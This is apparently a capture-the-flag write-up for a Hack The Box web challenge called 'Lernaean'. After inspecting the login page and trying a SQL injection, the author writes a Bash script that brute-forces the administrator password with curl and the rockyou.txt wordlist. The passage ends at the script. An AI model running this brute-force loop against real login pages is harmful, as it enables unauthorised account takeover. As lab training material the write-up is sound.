Not much of an "infocard" like with machines but at least you can see what it is about and the host and port to test.
Basically, this challenge looks to be dynamic at first when you start testing the page. The goal is to try and "guess" the administrator password.
Let's get started!
The Challenge
At first glance, it doesn't look like much so I thought of looking at the source code, but not much either except for the password field where you can send a password through a HTTP POST Method. But we know this already!
<html>
<head>
<title>Login - Lernaean</title>
</head>
<body style="background-color: #cd4e7b;">
<center>
<br><br><br>
<h1><u>Administrator Login</u></h1>
<h2>--- CONFIDENTIAL ---</h2>
<h2>Please do not try to guess my password!</h2>
<form method="POST">
<input type="password" name="password"><br><br>
<input type="submit" value="Submit">
</form>
</center>
</body>
</html>
But also, I thought of looking for anything interesting in the HTTP Request and Response, but nothing especial.
Tried as well a basic SQL Injection but nothing either.
At this point, I can try with a random password even though it didn't give me much above. I tried test123, but didn't get anything other than an Invalid password! message at the top.
Invalid password!
<html>
<head>
<title>Login - Lernaean</title>
</head>
<body style="background-color: #cd4e7b;">
<center>
<br><br><br>
<h1><u>Administrator Login</u></h1>
<h2>--- CONFIDENTIAL ---</h2>
<h2>Please do not try to guess my password!</h2>
<form method="POST">
<input type="password" name="password"><br><br>
<input type="submit" value="Submit">
</form>
</center>
</body>
</html>
As you can see, the response didn't changed from before. Right now, I'm scratching my head and can only think of bruteforcing the page. What I'll do instead of relying on a tool, I will write my own Bash Script and see how far I can get to.
Execution
The script will rely on using Curl and rockyou.txt. Also, the response will be sent to a file and will write over it through each iteration and compare the response against the word 'Invalid' from the previous response.
We know at this point we can send data to the password field in the HTTP Payload, so should be simple.
#!/bin/sh
ERROR="Invalid"
for PASS in $(cat /usr/share/wordlists/rockyou.txt)
do
echo "\n### Testing password $PASS"
(curl -X POST -d "password=$PASS" -s http://docker.hackthebox.eu:31027) > POST_Respose.txt
grep -iq $ERROR ./POST_Respose.txt
if [ $? -ne 0 ]; then
echo "\n"
cat ./POST_Respose.txt
exit 0;
else
echo "\nERROR: Invalid Password!"
fi
done
